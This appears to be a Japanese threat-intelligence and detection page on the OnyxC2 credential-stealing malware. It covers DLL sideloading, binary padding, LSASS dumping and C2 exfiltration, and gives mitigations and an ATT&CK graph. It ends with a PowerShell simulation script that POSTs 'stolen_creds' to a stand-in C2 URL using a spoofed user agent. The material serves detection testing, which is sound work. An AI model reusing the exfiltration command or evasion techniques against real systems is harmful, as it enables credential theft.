フォローする 
概要
OnyxC2は、約210種類のアプリケーションをターゲットにした資格情報、二要素認証拡張、および暗号通貨ウォレットを狙うマルウェア・アズ・ア・サービスステーラーです。このプラットフォームは、管理パネル、ビルダー、リモートアクセス機能を含む商業スタイルのツールキットを提供しています。また、大きめの署名済みバイナリを用いたDLLサイドローディングや暗号化ペイロードコンポーネントなど、高度な回避手法に依存しています。
調査
BlackFogの研究者は複数のOnyxC2サンプルを調査し、120 MB以上のNVIDIAグラフィックスライブラリに偽装した悪意のあるDLLを伴う署名済みホスト実行ファイルを悪用するDLLサイドローディング手法を発見しました。ネットワーク解析では、特定のバックエンドAPIエンドポイントとHTTPSで通信しているマルウェアが確認されました。研究者はまた、単純な静的解析を回避するためにDLL内に埋め込まれた暗号化されたオーバーレイも発見しました。
緩和策
エンドポイントでのデータの流出防止コントロールを展開することで、使用されるプロセスにかかわらず不正な外向きトラフィックをブロックすることができます。セキュリティチームは署名済みバイナリと関連付けられた疑わしいDLLロードを監視し、ユーザ書き込み可能なパスに現れる異常に大きなファイルを調査すべきです。強力なアプリケーション制御ポリシーと不正なスケジュールタスクの監視も推奨されます。
対応策
OnyxC2アクティビティが検出された場合、さらなるデータ窃盗を防ぐために直ちに影響を受けるシステムを隔離します。復号化ペイロードを回復するためにフルメモリーダンプをキャプチャし、アクティブなHVNCセッションまたはSOCKS5プロキシアクティビティを確認します。最近作成されたすべてのスケジュールタスクを見直し、ブラウザ資格情報ストアを検査して侵害の証拠を探します。
graph TB %% クラス定義 classDef action fill:#99ccff classDef builtin fill:#cccccc classDef malware fill:#ff9999 classDef discovery fill:#ccffcc classDef exfiltration fill:#ffff99 %% 初期アクセスと実行 action_user_exec[“<b>アクション</b> – <b idea=’T1204.002’>ユーザー実行: 悪意のあるファイル</b><br/>説明: 被害者はパスワード保護されたアーカイブをダウンロードするよう誘導され、<br/>その中には正規ソフトウェアを装った<br/>悪意のあるインストーラーが含まれている。”] class action_user_exec action action_side_loading[“<b idea=’T1574.002’>実行フローの乗っ取り: DLLサイドローディング</b><br/>説明: 正規かつデジタル署名された実行ファイルを利用して、<br/>borlndmm.dll という悪意のある肥大化したDLLを<br/>読み込ませる。”] class action_side_loading action malware_dll[“<b idea=’T1027.001’>難読化されたファイルまたは情報: バイナリパディング</b><br/>説明: DLLは120MB以上に肥大化され、<br/>正規のNVIDIAグラフィックス機能を含めることで<br/>セキュリティスキャナーの検知を回避する。”] class malware_dll malware %% 永続化とC2 action_persistence[“<b idea=’T1547’>永続化</b><br/>説明: オプションのスケジュールタスクによる<br/>自動実行機能を利用する。”] class action_persistence action action_c2[“<b idea=’T1071.001’>コマンド&コントロール: アプリケーションレイヤープロトコル</b><br/>説明: HTTPS を使用して /backend/api/app.php に<br/>ビーコン通信を行い、しばしば Cloudflare を経由して<br/>秘匿性を高める。”] class action_c2 action %% 情報収集と認証情報アクセス action_discovery[“<b idea=’T1217’>探索</b><br/>説明: Chromium系およびGecko系ブラウザ45種類から、<br/>保存されたログイン情報やCookieを含む<br/>ブラウザ情報を収集する。”] class action_discovery discovery action_cred_mgr[“<b idea=’T1555.005’>認証情報アクセス: パスワードマネージャーの認証情報</b><br/>説明: 5種類のパスワードマネージャーを標的として<br/>認証情報を窃取する。”] class action_cred_mgr discovery action_lsass[“<b idea=’T1003.001’>認証情報アクセス: OS認証情報ダンピング</b><br/>説明: LSASSメモリをダンプして<br/>認証情報を取得する。”] class action_lsass discovery %% 情報流出 action_exfil[“<b idea=’T1041’>C2チャネル経由の情報流出</b><br/>説明: パスワード、Cookie、ウォレット情報などの<br/>窃取データが action=up_d リクエストを通じて<br/>アップロードされる。”] class action_exfil exfiltration %% 接続フロー action_user_exec –>|につながる| action_side_loading action_side_loading –>|利用する| malware_dll malware_dll –>|確立する| action_persistence action_persistence –>|開始する| action_c2 action_c2 –>|引き起こす| action_discovery action_discovery –>|につながる| action_cred_mgr action_discovery –>|につながる| action_lsass action_cred_mgr –>|データを提供する| action_exfil action_lsass –>|データを提供する| action_exfil action_exfil –>|通信に利用する| action_c2
攻撃フロー
検出
異常なトップレベルドメイン(TLD)による不審なコマンド&コントロールDNSリクエスト(via dns)
表示
IOCs (HashSha256) 検出対象: Inside OnyxC2: The New Stealer Targeting 210 Apps
表示
IOCs (SourceIP) 検出対象: Inside OnyxC2: The New Stealer Targeting 210 Apps
表示
IOCs (DestinationIP) 検出対象: Inside OnyxC2: The New Stealer Targeting 210 Apps
表示
OnyxC2ステーラーのC2通信とTOR匿名化の検出 [プロキシ]
表示
OnyxC2のスケジュールされたタスク自動実行とキーロガー活動の検出 [Windowsプロセス作成]
表示
シミュレーション実行
必須条件: テレメトリ & ベースラインの事前飛行チェックの通過。
理由: このセクションは、検出ルールを引き起こすために設計された敵対技術(TTP)の正確な実行を詳述します。コマンドと説明は、特定されたTTPを直接反映し、検出ロジックによって期待される正確なテレメトリを生成することを目的としなければなりません。抽象的または無関係な例は誤診を引き起こします。
-
攻撃の概要とコマンド: 敵は盗まれたブラウザ資格情報を流出させようとしています。ネットワークセキュリティ監視による検出を避けるため、彼らはポータブルTorバイナリを使用して匿名化トンネルを作成します。一度トンネルが確立されると、マルウェアはそのコマンド&コントロール(C2)サーバーへの接続を開始します。正規のWebトラフィックに混じるため、マルウェアは自らのユーザーエージェントを「Cloudflare」と偽装し、Cloudflare プロキシの背後にホストされている特定のAPIエンドポイントをターゲットにします。この一連の流れは、検出ルールのコリレーションを引き起こすように設計されています。
torコマンドライン引数と特定の/backend/api/app.phpURLパターン。 -
リグレッションテストスクリプト:
# OnyxC2 ステーラー通信のシミュレーション # 1. Torの存在のシミュレーション(ダミーファイル/プロセスの動作を作成) # 実際のシナリオでは、これが実際のtor.exeになります $TorPath = "$env:TEMPtor.exe" "シミュレートされたTorバイナリコンテンツ" | Out-File -FilePath $TorPath # コマンドラインで'tor'によるプロセス実行イベントを作成 Start-Process -FilePath "cmd.exe" -ArgumentList "/c echo トサービスを実行中" -WindowStyle Hidden # 検出ロジック 'command_line|contains: tor' が当たるように、 # 文字列'tor'を含むコマンドを実行します cmd.exe /c "echo torプロキシの初期化..." # 2. C2ネットワーク接続のシミュレーション # PowerShellを使用して特定のURLとユーザーエージェントでのネットワーク接続をシミュレートします $C2Url = "https://cloudflare-proxy-mock.com/backend/api/app.php" $UserAgent = "Cloudflare-Proxy-Agent/1.0" Write-Host "C2通信を$C2Urlに試みています" Invoke-WebRequest -Uri $C2Url -UserAgent $UserAgent -Method Post -Body "data=stolen_creds" -ErrorAction SilentlyContinue -
クリーンアップコマンド:
# シミュレートされたアーティファクトを削除 Remove-Item -Path "$env:TEMPtor.exe" -Force -ErrorAction SilentlyContinue Write-Host "シミュレーションのクリーンアップ完了。"